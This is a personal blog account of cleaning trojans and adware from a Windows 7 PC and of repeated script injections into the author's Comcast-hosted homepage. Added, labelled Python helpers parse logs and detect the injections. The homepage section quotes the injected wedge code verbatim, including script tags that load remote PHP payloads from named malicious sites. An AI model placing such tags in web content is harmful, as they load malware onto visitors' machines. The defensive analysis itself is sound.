        The new hosts file was written at exactly the same time as Adobe Flash install software automatically downloaded and very aggressively popped up a big window over my work asking to be installed. From the size of the Adobe file and its attributes it did look like it was probably from Adobe (now I suspect this is a fake, but who knows), but I am pretty sure that coming along with it is this aggressive advertising crap that changes the 'hosts' file.

How to delete hosts file (update 12/4/12)
        From before I knew what needed to be done, just delete the added redirect lines at the end of the file. And like before I couldn't do it; Notepad was unable to overwrite the file. It's read-only, and when I try to change the attribute, it tells me I don't have permission. Last time by screwing around with it I was somehow able to rewrite 'hosts', but didn't really know how I did it. I tried this again and nothing worked.

        I found a web site discussing exactly this problem, and they had the same problem: they couldn't change the 'hosts' file. They traced it down to the malware having changed the file owner (group) to "Authenticated Users", making it impossible for anyone, even administrators, to change it. I checked my 'hosts' file and found the same thing, the only one able to change it was "Authenticated Users". This site came up with a low level fix involving some command line system utility called 'CACLS', which I don't understand, that allowed them to add 'administrators' to the file's owner list.

* Run Notepad as administrator to change 'hosts' file
        With some more googling, however, I discovered a much simpler way to change the locked read-only 'hosts' file. The trick is to open Notepad as Administrator: right click Accessories, Notepad and select 'Run as administrator'. In Notepad then open 'hosts' at c:\windows\system32\drivers\etc\ and delete the added lines. Notepad opened as administrator I found can now overwrite the corrupted, locked, and read-only 'hosts' file. (Well it worked once, but when I tried it the next time it would not work!)

*         Hosts is the key file controlling the popups. After a few days with no popups, they were back. I checked with a quick HiJackThis scan and sure enough a few hours earlier someone had rewritten hosts.

        However, when I tried the above procedure it didn't work! I get an error message on save saying the file is read-only. Time to do more research.

** This works to rewrite Hosts file! (12/6/12)
    1) Change Hosts properties first
            Properties, Security ("Authenticated Users"), Edit, Full Control, Apply, then unclick Read-only
    2) Notepad (run as administrator) can now overwrite 'hosts'
    3) May need to save file as "hosts" (with quotes)

(change properties back to 'read only' advises one poster to keep Microsoft from changing it? I am going to skip this step and see what happens)
---------------------------------
** Temp34.exe virus
        I did a Ctrl-Alt-Del and found a process running called 'temp34.exe *32' with description 'temp34.exe'. Looked suspicious. It's a large executable file downloaded only two days ago.    (c:\windows\temp\temp34.exe     752 Kb)   A google search turns up 'Spyware Removal' (http://www.spywareremove.com/file/temp34exe-322169/) saying they have 234 reports it is malware associated with 'Backdoor.Kelihos.F'

        And son of a gun while I am reading about it, the popups come back. I find hosts is again changed just a few hours after I fixed it, and I had been only on mainstream news sites in the meantime!

        Run MalwareBytes Anti-Malware and sure enough it flags temp34.exe as a trojan ('Trojan Lameshield'). And it has a registry value. Program also finds a trojan with a random name c:\users\window_7\wgs.......exe

        "Trojan.Lameshield Virus is nasty Trojan. It creates combine effect of rootkit and adware. Which means you will be bombarded with a lot of ads and your browser gets hijacked and redirect to specific page."
==================================================================================================
Microsoft 'System File Checker' tool details
Windows 7 can fix its own files
(c:\Windows\System32\sfc.exe)

        A reference pointed to a tool built into the Windows 7 operating system that I had never heard of: System File Checker (sfc.exe). This program is a real gem and can fix a lot of weird Windows problems. It checks, and its key feature, will automatically replace corrupted Windows 7 system files with clean versions. Yes, Windows 7 has a tool (built-in) to fix its own files! Who knew. Windows was preinstalled on my machine, so for backup purposes there is an archive of (original) Windows files on drive d:\, and this is what the program uses. I read that if your machine has no Windows archive on the hard drive, then you need a set of Windows backup disks to run this program, which obviously makes it harder to use.

Safe mode and registry file editor not working
        Prior to running this tool I had lost two vital system functions needed to fight virus attacks: 'regedit.exe' would not run and Safe mode came up with a black screen, no icons. The Windows registry editor (regedit) would not run, no error message, it just ignored any request. Made a copy of it with different name, but it won't run either. I downloaded a free registry cleaner (Free Window Registry Repair). I found it was able to access and change the registry, but even with a lot of cleaning 'regedit.exe' still would not open.

How to run it
        All Programs, Accessories, select Command Prompt, right click it to run it as administrator, then type in the DOS-like window the text below

                    sfc /scannow                         (sfc => system file checker)  (note space between sfc and /scannow)

        It takes 10 min to run. If it finds no problems it tells you at the end. In my case it just told me it had repaired some files, but I needed to go to its log (c:\Windows\Logs\CBS\CBS.log) to see what changes it had made. Its log showed it repaired several files including a version of regedit (not actually regedit.exe), but this fixed the problem. Regedit now runs normally!

Safe mode and regedit repaired by sfc.exe
        Not only did System File Checker fix regedit, but it appears to have fixed Safe mode too, my Safe mode icons are back!  For the last week or so since my ad infestation and prior to running System File Checker when I went into Safe mode I had no icons, just a black screen with Safe in the four corners and the Build # at the top. It was usable in this corrupted state, but just barely. Ctrl-Alt-Del would bring up Program Manager and under File, Run a new process, you can get to a file browse screen, and from there by knowing the location of MalwareBytes anti-malware I can run it. Repeated web searches showed a few others had the same problem with Safe mode, and I found the 'Run' work around tip, but no one had any idea as to how to fix the Safe mode corruption. I think I stumbled on it.

        On forums I find comments that the utility of tools like file checker can be compromised if the OS is updated with service packs. (Really? I hope Microsoft isn't this stupid.)

More on Microsoft 'System File Checker'
         I have used Windows for decades and had never heard of System File Checker (sfc.exe). One reference called it a staple of IT pros. I did not have to download this program, it is part of Windows 7 Home operating system, yet curiously there is no mention of it in the Windows Control Panel or Help System! (typical Microsoft...)

Microsoft explains here how to run it
**        "Use the System File Checker tool to troubleshoot missing or corrupted system files on Windows Vista or on Windows 7"
         http://support.microsoft.com/kb/929833#method1

Here is a video on the history of sfc.exe and a demo of how to run it
         http://windows7forums.com/blogs/mike/353-compute-confidence-windows-system-file-integrity-checker.html

Safe mode with no icons
        The Safe mode screen with no icons is interesting. It's a black screen with Safe in four corners and Build # on top. When I found icons had disappeared from my Safe mode screen, I found that running System File Checker fixed the problem. I saw a few other people online reporting this same problem, but without fixes.

        When I stumbled onto this, I considered it to be a damaged Safe mode, and maybe it is, but now I am not so sure, because I have found a way to get into it at will. This procedure will do it: boot to Safe mode opening screen (F8 from a power up state) and select 'Safe mode with Command Prompt', then type 'exit' to close out the command window, and Voila you end up in a black screen with 'Safe' in four corners and Build # on top and no icons.

        I had read online that in this black, no icon Safe mode screen by hovering the mouse over the lower left corner a start menu would popup. I hadn't noticed while recovering from viruses, so I was skeptical. When I try it on the black Safe screen I get using the procedure above, sure enough it doesn't work. I can click and hover anywhere on the screen and nothing happens.

How to navigate in the 'black' Safe mode screen
        What does (normally) work in the 'black' Safe mode screen, and as far as I can tell the only thing that works in the screen, is Ctrl-Alt-Del interrupt. This allows you to get to Task Manager, and from there by selecting 'file, run, browse' you can get to Explorer, so if you know the address of anti-malware or other programs you can run them. I stumbled onto this trick and found it to be one of the best tricks to help recover from difficult virus attacks.
------------------------------------------------------------------------------------------------
Fake Adobe Installation virus recovery (12/6/12)
        I have confirmed that an Adobe Installation screen (with sliding bar) that aggressively pops up is in fact a fake. It has popped up twice this morning. I quickly hit the kill 'x' and it disappears, but don't know what this means. MalwareBytes shows two recent trojan infections both in c:\windows\installer and almost for sure are what is throwing up the Adobe screen

            Rootkit.0Access
            Trojan.Dropper.BCMinor

I have multiple problems trying to recover from this one

        1) Malwarebytes (in normal Windows mode) can't seem to kill this. It says it quarantines it, but a few minutes later it is back. I run Malwarebytes again and same problem.
        2) c:\windows\installer doesn't show any recent entries, nor can I find a file or directory with the URL Malwarebytes gives
                  (Reason -- date on '1dace891... ' directory was old which faked me out, but inside it I found two subdirectories 'U' and 'L' with today's date)
  **  3) Can't get into Safe mode. F8 on two tries does not work. This is a big problem. I was going to run Malwarebytes from Safe mode, but I can't get there. I have shut down my cable modem and will run 'System File Checker' to see if it can fix the Safe mode problem.

           (I eventually got to Safe mode, but whether it was hardware power down (holding power button down) or deletion of the
             fake Adobe Rootkit files I don't know. Getting into Safe mode with F8 on a restart is hard (failed four times in a row),
             better to start boot from a power up.)

Even though my system was clean a few days ago, System File Checker reports that it did indeed find corrupted files and repaired them. Very hard to read the long log file, but searching 'corrupted' it looks like this file was corrupted and replaced.  (I later read every time you run the System File Checker it just appends to the existing log, so to see the results of the latest run you need to start by searching for the current date.) Who knows what this file does.

            C:\Windows\System32\services.exe
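        Searching the CBS log by hand for 'corrupted' and for today's date, as described above and in the sfc.exe section earlier, is tedious because sfc appends every run to the same file. The Python below is an added example, not part of this essay or of Microsoft's tooling: it picks out the '[SR]' lines the System File Checker writes, groups them by run date, and lists which files a given run repaired and which it could not. The log excerpt it scans is constructed here in the approximate shape of real CBS.log lines; apart from services.exe, which the text names, the file and component names in it are made up.

```python
import re
from datetime import date

# Constructed CBS.log excerpt: two sfc runs on different days in one append-only file.
# Only services.exe is a name from the text; the other file names are constructed.
SAMPLE_CBS_LINES = [
    r'2012-11-30 09:12:01, Info                  CSI    00000101 [SR] Verifying 100 (0x0000000000000064) components',
    r'2012-11-30 09:12:05, Info                  CSI    00000102 [SR] Repairing corrupted file [ml:520{260},l:66{33}]"\??\C:\Windows\System32"\[l:22{11}]"example.dll" from store',
    r'2012-11-30 09:12:06, Info                  CSI    00000103 [SR] Repair complete',
    r'2012-12-06 10:41:11, Info                  CSI    00000201 [SR] Verifying 100 (0x0000000000000064) components',
    r'2012-12-06 10:41:15, Info                  CSI    00000202 [SR] Repairing corrupted file [ml:520{260},l:66{33}]"\??\C:\Windows\System32"\[l:24{12}]"services.exe" from store',
    r'2012-12-06 10:41:16, Info                  CSI    00000203 [SR] Cannot repair member file [l:26{13}]"unfixable.sys" of Constructed-Component, Version = 0.0.0.0 in the store, hash mismatch',
    r'2012-12-06 10:41:17, Info                  CSI    00000204 [SR] Repair complete',
]

# date, time, level, "CSI", sequence id, then the [SR] message sfc writes.
SR_LINE = re.compile(r"^(\d{4}-\d{2}-\d{2}) (\d{2}:\d{2}:\d{2}), (\w+)\s+CSI\s+\S+ \[SR\] (.*)$")
QUOTED = re.compile(r'"([^"]*)"')


def run_dates(lines):
    """Dates on which [SR] lines appear, in log order; the last one is the latest run."""
    dates = []
    for line in lines:
        m = SR_LINE.match(line.rstrip("\n"))
        if m:
            d = date.fromisoformat(m.group(1))
            if d not in dates:
                dates.append(d)
    return dates


def scan_cbs_log(lines, run_date):
    """Summarise one run: how many [SR] lines it wrote, which files it repaired or could not."""
    target = run_date.isoformat()
    summary = {"sr_lines": 0, "repaired": [], "unrepairable": []}
    for line in lines:
        m = SR_LINE.match(line.rstrip("\n"))
        if not m or m.group(1) != target:
            continue  # skip non-sfc lines and runs on other days
        summary["sr_lines"] += 1
        message = m.group(4)
        quoted = QUOTED.findall(message)
        if message.startswith("Repairing corrupted file") and quoted:
            summary["repaired"].append(quoted[-1])  # directory is quoted first, file name last
        elif message.startswith("Cannot repair member file") and quoted:
            summary["unrepairable"].append(quoted[0])
    return summary


def scan_cbs_file(path, run_date=None):
    """Read a real log (CBS.log is large and may hold odd bytes) and summarise one run."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        lines = fh.readlines()
    if run_date is None:
        run_date = run_dates(lines)[-1]
    return scan_cbs_log(lines, run_date)


if __name__ == "__main__":
    # For a real machine: scan_cbs_file(r"C:\Windows\Logs\CBS\CBS.log")
    latest = run_dates(SAMPLE_CBS_LINES)[-1]
    result = scan_cbs_log(SAMPLE_CBS_LINES, latest)
    print(f"run on {latest}: repaired {result['repaired']}, could not repair {result['unrepairable']}")
```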

        I was able to locate the two trojans identified by Malwarebytes and found several more suspect files in two different subdirectories ('U' found by Malwarebytes and 'L') that had come in two groups about an hour ago and deleted them all.

                    c:\windows\installer\(1dace891.....

        Without rebooting ran Malwarebytes again, and this time it comes up clean. Rebooted by pushing power button and this time F8 brought up Safe mode. Ran MalwareBytes in Safe mode and again clean. Reconnected to internet rebooted normally and again ran Malwarebytes and still clean. HiJackThis tells me 'hosts' file OK too, so it looks like fake Adobe Installer, which is really trojans [Rootkit.0Access] and [Trojan.Dropper.BCMinor], are gone. (And for three weeks they have stayed gone)

Does hardware power (button held down) work better than soft Restart for getting into Safe Mode?
        Two tries with F8 had failed. The second F8 try failed after System File Checker ran and fixed a system file. F8 on 3rd try finally worked either because the fake Adobe installer trojan files had all been deleted or because I had used the hardware button (held down) to shut off. (I since had two more failures trying to get into Safe from a restart. A boot from power up sometimes fails too, but it works more than half the time.)

Tablet camera is a good tool
        I found a real convenience in virus fighting (since paths are so long and file names often long random strings) is to use the camera on my BB tablet computer to photograph outputs from the tools. Then later I can pull up the tablet picture and use Explorer to go search for the 'bad guy' files.

===================================================================================================

Did a trojan virus cause my computer crash?
(Dec 27, 2012)

Introduction
       I suffered my 3rd computer crash in my Windows 7 machine in two years recently. Wouldn't boot, machine sat 'dead' for a week, while I ran on my backup XP machine. Bought a new hard drive and Windows 7 disks, but didn't put it in when I managed (using System Restore on 4th try!) to get the old hard drive to boot. I then ran malware tools on it and looked at their logs around the time of the crash, and son of a gun if a trojan file didn't load just seconds before the crash. Did a trojan crash my machine and prevent it from rebooting? I think maybe it did.

        Now a strange twist. I run my anti-malware utilities and Malwarebytes Anti-Malware reports one suspicious item:

                Trojan.Agent.NIX                    E65B.tmp               124k         @ 22:05:23  (10:05 PM)     12/11/12

        When the computer crashed, I noted the time on the wall clock: about 10:04 pm, Tues 12/11/12. This is very close to the time the virus file was written. I do a time search using Agent Ransack, and it shows the last file written to the drive (before a gap of four hours) was 22:05:54, which is just 31 seconds after the virus/trojan comes in. Since the crash shutdown maybe took 5 -10 seconds before power off, it looks like the computer began to go down about 20 seconds (or less) after the virus came in! (I say 'less' because it's possible that some of the files at the end were written during the failed boot that I immediately tried, though it didn't look like it.)

        What are the odds! This is a strong circumstantial case that my computer/hard drive crash was caused by this virus! (However, I suppose it is possible that my power button forced power down in the midst of a virus induced computer crash might have actually caused the boot problem. Who knows?)

        I looked at all the files Agent Ransack found around this time looking for more virus stuff, but found nothing really suspicious. I did see that Malwarebytes had detected E65B.tmp coming in with writes to its log "Allowed" at the exact second it came in. I can find out very little about this virus. I do see it listed in some virus lists, but with no other info. On the negative side, it's a .tmp file, didn't see any .exe files in the time window. A search of the registry for 'E65B.tmp' came up null. So other than the (very strong!) time coincidence, I don't see how a .tmp file (alone) caused the shutdown. (More research turned up very little E65B.tmp or Trojan.Agent.NIX except it might be associated with Dyfuca or Rootkit.TDSS)

New insight on .tmp virus file
        Clearly a weakness in the argument that a virus crashed my computer is that the virus file written seconds before the crash was a .tmp file rather than an .exe file. But a recent attack by a more virulent variant of the FBI lock virus has given me new insight on this.

        In the latest FBI attack, where Safe mode was also disabled, a search of a few minute time window (centered at the time of the attack) found only two .tmp virus files (both logged by Malwarebytes), no .exe file at all in the window. Using the Malwarebytes log I was able to find the virus .exe file, but unlike in all previous attacks, the virus .exe file had downloaded minutes earlier (about 19 minutes before lock) and seems to have waited around for the .tmp file(s) to appear, because the lock happened exactly when the .tmp files were written.
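        The time-window search described above (for the E65B.tmp crash: find the last write before the four-hour gap and measure how long after the detection it came; for the FBI lock: look back from the .tmp files for an .exe that arrived minutes earlier) is a small timeline correlation. The Python below is an added example, not code from this essay or from Agent Ransack or Malwarebytes: given a list of (write time, path) entries and a detection time, it returns the writes within a window around the detection, the last write before a long gap, and any executables written in the minutes before. The timeline it runs on is constructed; the times the text reports (the 22:05:20 screen capture, E65B.tmp at 22:05:23, the last write at 22:05:54) are kept, every path is made up, and the .exe 19 minutes earlier models the FBI case rather than the crash.

```python
from datetime import datetime, timedelta

# Constructed file-write timeline. Times from the text are kept; paths are constructed,
# and the .exe entry models the "downloaded minutes earlier" pattern of the FBI attack.
SAMPLE_WRITES = [
    ("2012-12-11 21:46:23", r"C:\Users\window_7\AppData\Local\Temp\constructed-dropper.exe"),
    ("2012-12-11 22:05:20", r"C:\Users\window_7\Pictures\screen-capture.png"),
    ("2012-12-11 22:05:23", r"C:\Users\window_7\AppData\Local\Temp\E65B.tmp"),
    ("2012-12-11 22:05:23", r"C:\ProgramData\Malwarebytes\protection-log.txt"),
    ("2012-12-11 22:05:54", r"C:\Windows\Prefetch\constructed-last-write.pf"),
    ("2012-12-12 02:30:12", r"C:\Windows\System32\LogFiles\constructed-boot.log"),
]


def parse_writes(rows):
    """Turn (timestamp string, path) rows into a time-sorted list of (datetime, path)."""
    return sorted((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), path) for ts, path in rows)


def writes_within(events, center, before_s=60, after_s=60):
    """Every write inside [center - before_s, center + after_s]."""
    lo, hi = center - timedelta(seconds=before_s), center + timedelta(seconds=after_s)
    return [(t, p) for t, p in events if lo <= t <= hi]


def last_write_before_gap(events, min_gap):
    """The last write before the first silence of at least min_gap (the crash, here)."""
    for (t, p), (t_next, _) in zip(events, events[1:]):
        if t_next - t >= min_gap:
            return t, p
    return events[-1]


def executables_before(events, center, minutes):
    """Executables written in the `minutes` before `center`, oldest first."""
    lo = center - timedelta(minutes=minutes)
    return [(t, p) for t, p in events if p.lower().endswith(".exe") and lo <= t <= center]


def correlate(rows, detection, gap=timedelta(hours=4), lookback_minutes=30):
    """Run all three checks around one detection time."""
    events = parse_writes(rows)
    last_t, last_p = last_write_before_gap(events, gap)
    return {
        "window": writes_within(events, detection),
        "last_write": last_p,
        "seconds_after_detection": int((last_t - detection).total_seconds()),
        "earlier_executables": executables_before(events, detection, lookback_minutes),
    }


if __name__ == "__main__":
    # On a real drive, build `rows` from os.stat() mtimes over the directories of interest.
    detection = datetime(2012, 12, 11, 22, 5, 23)
    report = correlate(SAMPLE_WRITES, detection)
    print(f"last write before the gap: {report['last_write']} "
          f"({report['seconds_after_detection']} s after detection)")
    for t, p in report["window"]:
        print(f"  {t:%H:%M:%S}  {p}")
    for t, p in report["earlier_executables"]:
        print(f"executable {int((detection - t).total_seconds() // 60)} min earlier: {p}")
```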

        Bottom line --- Maybe my hard drive is OK and the cause of the computer crash (if not the boot failure) was this virus. If not, it is a strange coincidence.

Where did E65B.tmp trojan file come from?
        A further and important mystery is where did the file E65B.tmp come from. My memory was I was not browsing when the sound went off and the computer began to suddenly log off, I was watching TV on my computer. And I found data that confirmed this. I found that I took a screen capture picture (TV show Cheers) at 22:05:20. This is just three seconds before E65B.tmp trojan file is written.

        Very weird. From the time of the picture this confirms that I was (probably) not browsing at the time this (virus) file is written, so where does it come from? (This weakens the case somewhat that this virus file caused the crash.) I can't be 100% positive I was not browsing as I often switch back and forth, still the picture is just three seconds ahead of the file time.

        One possibility here is that my computer has gotten some bot rooted deep that no malware can find, and it has some control of the machine and is possibly downloading and (horror) uploading stuff on its own. Scary. This would be an argument for either putting in my new hard drive, or doing a reformat and reinstall of Windows and all my programs.
================================================================================================

Google warns my (online) home page is infected
'This site may harm your computer'
         created: Sept 22, 2013
         updated: Dec 25, 2013

No more homepage infections (update 12/25/13)
        While it took me quite a while to figure out how my homepage was getting (repeatedly) infected, when I did, it was not difficult to block access to the bad guys. Turns out all that is needed for your homepage to get infected is for bad guys to get access to the username and password you use to access your homepage files on your server. (Your server is generally easily identified.) With this information they can download your files, modify them (adding javascript virus code in my case), and then upload them to your server overwriting the original files. Presto your homepage is infected, and when Google next checks, they will flag your search result with the dreaded: 'this site may harm your computer'. Solution: change username and/or password.

Overview (9/22/13)
        I noticed the Google listing for my home page ('Twinkle Toes Engineering') was now marked (see below) --- "This site may harm your computer", which was not only a warning, but basically a block since there was no link to continue. Not good. Everything on my site, nearly 70 essays, was blocked! In a review of my files Google told me my site was seriously infected, but gave no help in figuring out by what, where or how. I was on my own to find and fix the problem.

        By downloading a sampling of my files from the Comcast server and looking at the raw source code with my Opera browser I discovered that every one of my .htm files was infected. A full page of javascript code had been inserted, usually after the title. Looking at the raw source code of the original .htm files on my hard drive showed they were clean, none of them had this javascript code. The Comcast files were all infected and my local files were all clean! Hmm... This means my html editor (Netscape Composer) and local files had not been attacked. A quick upload/download test showed that my FTP utility (CoffeeCup Free FTP) was not corrupting the files. The only remaining possibility was that the files got infected while on the Comcast server. Comcast was responsible for my site getting totally virus infected, or so says Google (and what do they know about programming)!

Raw htm code showing infection
       Here are screen captures of the raw html code from one of my homepage .htm files (as displayed by Opera 12.16). The first version I downloaded from the Comcast server, and the second below it is the version of the same file from my local hard drive, which is the master file. Notice the several lines of red 'javascript' code in the first screen. Notice how it is formatted differently from the rest of the code output by my html editor. This (red) javascript code does not exist in the second screen capture of the version of the master file from my hard drive. This javascript code was inserted into my .htm file, into all my .htm files on the Comcast server, at Comcast, presumably by a virus. I have no way of knowing what this javascript code does (It is a miniature program, which is actually much longer than it appears below because the javascript code extends far off screen to the right), but Google has flagged it as a virus infection.


[Screen capture 1: virus added javascript code (in red) in one of my .htm files on Comcast computers; notice how it is differently formatted from the code my Netscape html editor produces. Viewed using Opera 12.16 'Source code'.]

[Screen capture 2: the master of the same .htm file on my hard drive (clean --- no virus added javascript).]

        Even the remote possibility that a virus on my computer might have found my .htm files, figured out my server was Comcast (oh, yea) and uploaded files that it altered while uploading can be ruled out. I found on the Comcast server an old file I had deleted years ago from my hard drive (an early telephone-telegraph file, before I split it into two separate essays). I downloaded it, and sure enough it was corrupted too by the virus-entered javascript code. That nails it: the modification of these files had to have occurred at Comcast. All my files (with one exception) in two different directories had the added javascript code, exactly the same code added to every .htm file. The one Comcast file without the javascript code was one I had uploaded a new rev of just days before.

Time of attack
        Further, I can see when the virus attack took place. My FTP utility shows me the filetimes of my files on the Comcast server, and I see every .htm file on the server was rewritten in a three-minute period about five days ago (9/17/13).

Cleaning up Comcast files
       I cleaned up my site by uploading clean versions of all my nearly 70 .htm files from my local drive to the Comcast server, overwriting the existing files there. After hours of work to figure this all out and clean up Comcast's mess at 4:00 am I requested Google do another virus review of my site and went to bed. Next morning my Google listing was clean, the 'harm your computer' warning gone.

        Now to bitch at Comcast, who has never informed me that their system was attacked and files were corrupted. (Or are they going to tell me they added the code, and it is benign? If so, they better tell Google!)

Tackling the problem
         At first I had no clue as to how to proceed to find the virus in my home page, no idea what to look for in the raw html source code. I had had a lot of virus infections on my computer this year, so my first guess was a virus had gotten to my local .htm files (or maybe my html editor).

Javascript code in every .htm file at Comcast!
        When I started comparing my local files to the same files on the Comcast computers, it wasn't hard to find the infection. (see figures above). A long string of 'javascript' (in red) has been added to all my .htm files on the Comcast computer (surprisingly not at the end, but usually after the title), code not present in the (master) version of the files on my hard drive.

        That means the virus infection of my site happened at Comcast! I've always thought Comcast 2nd rate technically, another nail. And of course there has been no email from them saying that they were compromised, and as I write it is five days after the attack.

        I have no idea what the virus-added javascript code does (or even its name; it is all in hex). It took many hours of work to figure this all out. After uploading clean versions of all my htm files (not the pictures) to Comcast, at 4:00 am I asked Google to do another virus check of my site and went to bed. Woke up next morning and the warning was gone from my Google listing, so replacing all the .htm files did the trick. As a followup I used a fragment from the javascript code to search for any local file that might contain it. I found a few cryptically named .htm files with this fragment in a special recycle directory called 'S-1-5-18', which I don't understand, and can't delete.

        Another virus adventure, another virus recovery.
------------------------------------------------------------------------------------------------------------
My homepage is infected again!(10/4/13)
        About two weeks after I cleaned up my site and Google removed the warning, I check my site at a hotel (on 10/2/13) and again I find it blocked, same 'harm to your computer' warning from Google. At the hotel with some effort I manage to get around the block and open one of my essays and look at the source code, and there it is. Again a long block of javascript has been wedged into every one of my .htm files on the Comcast servers. I am pissed. (I had not called Comcast about the first attack, thinking the problem was behind me.)


Firefox warning on 10/4/13


Clicking 'Why was this page blocked?' (above) brings up this page 10/4/13


Clicking the AS30217.... link (above) brings up this page 10/4/13
Notice all the home.comcast sites that are infected!! Gee I wonder why?

Many Comcast homepages are infected!
        Look at the above screen downloaded 10/4/13. Google is reporting that a lot of home.comcast.net pages are infected. Clearly my site is not singled out, a lot of home pages on the Comcast servers are infected!

Comcast file dates
        As before I see all my .htm files on the Comcast server have filedates showing they were all rewritten within a three-minute period. But I see something interesting. Looking on Fri 10/4/13 I find all dates/times are Thur 10/3/13 17:40 (index file) to 17:43. But I had seen the Google warning the day before on Wed 10/2/13. This must mean the files are being regularly rewritten! Is it possible Comcast adds something for their own benefit? So far a quick google turned up nothing.

Upload virus file test
        On Fri 10/4/13 at 5:40 pm (17:40) I uploaded a slightly modified version of my hydrogen car .htm, which I looked at and verified is clean. I have not linked in this file to my index or any other file. My FTP utility shows the upload filetime at Comcast is 21:40, which is four hours later than EDT. A little checking shows this is the current GMT. This means the files were rewritten at Comcast at 17:40 GMT - 4 = 1:40 pm EDT Thur. I had left the hotel by this time, and I know I checked the files Wed night.

        The file sizes are also interesting, but I don't understand them:

                 file                                         On my hard drive    On Comcast server
                 hydrogen_car.htm                                  169.9k              166.4k
                 hydrogen_car_virus_test 10-4-13.htm               169.8k              167.5k

        I am going to watch this uploaded .htm file and see if, or when, it gets rewritten and presumably modified with added javascript. As recently uploaded it has a file date of Oct 4th, about 28 hours after all the other .htm files.

(update 10/8/13)
        My virus test file, which has been sitting on the Comcast server but is not part of my site, survived for three whole days on the Comcast server computers before being rewritten and modified. Checking on the following Tues I find all my .htm files on the Comcast server have been rewritten (again!), most on the previous day, Mon (10/7/13), in a three-minute period 13:44 to 13:47. The only exception is two .htm files that have a later filedate, Tues (10/8/13) at 11:50, and curiously one of these files is the index file.

Javascript 'header' most common
       When I look at the source code of my virus test file (hydrogen_car_virus_test 10-4-13.htm ), I find it has been modified with code wedged into it, but not as before. The only code I find has been added is below, which looks like the javascript header without the body.

         <!--2d3965--><script type="text/javascript" language="javascript"></script><!--/2d3965-->

        When I download more files from the Comcast server, I find all, but one, have just a javascript 'header' (like above) wedged in. This is very different from about two weeks ago when every .htm file I looked at had a big chunk of javascript added. However, this time one file still carried a big piece of added javascript wedged in, and probably not coincidentally it was the index file.


Google warning #2 about my homepage
(screen capture 10/8/13)

left: clean version (my local file)
right: same file with single line javascript code (red and green) wedged in at Comcast
(screen capture 10/8/13)


Comcast filetimes showing massive rewrite of my .htm homepage files 10/7/13 at 13:44

Warning removed again by Google
       On Oct 8th for the 2nd time I cleaned up the infection at Comcast. I deleted all my .htm files at Comcast, then uploaded a clean set from hard drive. I then told Google I had cleaned up the site and asked them to recheck it. Next day I found Google had removed the virus warnings from all my URLs.

Comcast 3rd infection (10/24/13)
        This time I caught the infection before Google (I hope) on the day all the files were rewritten on the Comcast server (in three min as usual), but there were some twists this time.

                        <script src="http://realhospitalar.com.br/tmp/KX935Fs3.php"

        1) There was readable code (above) in the javascript wedge, but only in the index file. All other files had some javascript wedged in too, but it looked like the body was empty. The above gives me something to trace, and while there were only a couple of returns by Google, in fact Google browsing identifies the exact URL above as 'Malware site' (though many other virus programs say the site is clean).

        I think the above code means the http site is the source of the javascript. '.com.br' is country of Brazil. 'realhospitalar' is Portuguese and means Royal Hospital

        2) This little piece of readable code proves that the javascript wedge is not something Comcast is doing for its own purposes. It has got to be a VIRUS. I called Comcast for the first time to try and get hold of some technical expert on web pages, without success. All I got was an offer of some sort of boilerplate virus check, for which they were going to charge me $130. I hung up. Later that same evening I had the Comcast site cleaned up and my local homepage files back to normal.

        3) There is some circumstantial evidence that maybe the infection is on my machine and the uploading is coming from it. Still seems remarkable to me that a virus would know how to make an FTP connection with my server, which it has to figure out is Comcast, AND on top of this the files need to be modified on the fly as the upload occurs. Probably doable, but seems very difficult.

Virus on my machine?
       What is the evidence? The clue that something may not be right on my machine is that I found on the same day that more than half of my web site files were missing! Everything after 'h' was missing, .htm and picture files too. (Of course I have backups.) I got contradictory file properties and finally figured out that the missing files were apparently where they always are, but they were somehow hidden. The visible .htm files looked clean, and when I eventually got control of the other .htm files on my hard drive they looked clean too.

        I was going to delete the directory and rewrite it, but first I powered down. When I restarted, I got a chkdsk screen that said my files should be checked. I let it run and it took 15-20 min, finding quite a few errors and fragments. But when Windows finally restarted my missing files were where they should be and all visible. A sample of a few showed they were clean. So I overwrote all the Comcast .htm files with what I hope are clean versions from my hard drive.

        Is this a coincidence or the work of the virus? Don't know, it might just be a coincidence. I ran all my virus tools and nothing. I searched the registry with the key word and blank. I did a file search for text containing the key word. A few files (after hours) showed up, but they all carried later dates. (I deleted what I could of them).

        So some progress, but the source of the infection is still a mystery. The only odd virus like thing that happened today is a couple of times a window popped up saying I needed the VLC media player to view page. This looks bad. I have never seen anything like this, but a scan for a running VLC file came up blank.

Another clue the virus might be local
        There is another clue that the virus might be on my machine and causing an upload of corrupted files to Comcast. That clue is the file times on the Comcast server. When I did a mass upload of all my .htm files (previously I uploaded in batches), I noticed (on a quick look) the file times on the Comcast server were in a three-minute window. This is just what I see when I find my files corrupted on Comcast! What are the odds it would take 3 minutes to rewrite the files if the virus was present on the Comcast servers?

        This opens up the option for doing some tests. For example, plant a dummy .htm file locally that I do not upload (zz_virus_upload_test.htm). The virus could be working just by uploading the .htm files it finds in the same local directory as the index file (and subdirectories). Or it might be reading the index file and using that as a guide as to which files to upload, or it might even be sequentially downloading a file, wedging in the javascript, and then uploading it again. I probably should link to the dummy file in the index file.

Comcast 4th infection (10/28/13)
        I think the virus may be winning. It used to be about two weeks before a reinfection; this time it's just three days! This time only about 2/3 of the files had new filetimes, and only these were corrupted. The wedged javascript code has changed. This time it is calling the source code from a new location (below), which of course shows up in a google search as reported malware. I immediately cleaned out all the .htm files and uploaded a clean set (with my zz_virus file trap set).

                        <script src="http://sgaccounting.net/wp-includes/YXdeEXY6.php"

Wedge code in index file: <!--339810--><script type="text/javascript">var gwloaded = false;</script><script src="http://sgaccounting.net/wp-includes/YXdeEXY6.php" type="text/javascript"></script><!--/339810-->
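The comparison described above (download the server copy, set it beside the local master, and look for the wedge) can be automated. The following is an added example, not code from the essay or from any tool it mentions; it assumes the wedge always has the shape seen on this page, a six-hex-digit marker in an HTML comment, the injected script element(s), and a matching closing comment. The sample master and server copies are constructed here from the wedges quoted on the page.

```python
import re
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Shape of every wedge quoted on the page:
#   <!--339810--> ...one or more <script> elements... <!--/339810-->
# The back-reference \1 insists that the closing marker matches the opening one.
WEDGE_RE = re.compile(r"<!--([0-9a-fA-F]{6})-->(.*?)<!--/\1-->", re.DOTALL)
# External script source inside a wedge body (absent in the "header only" wedges).
SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


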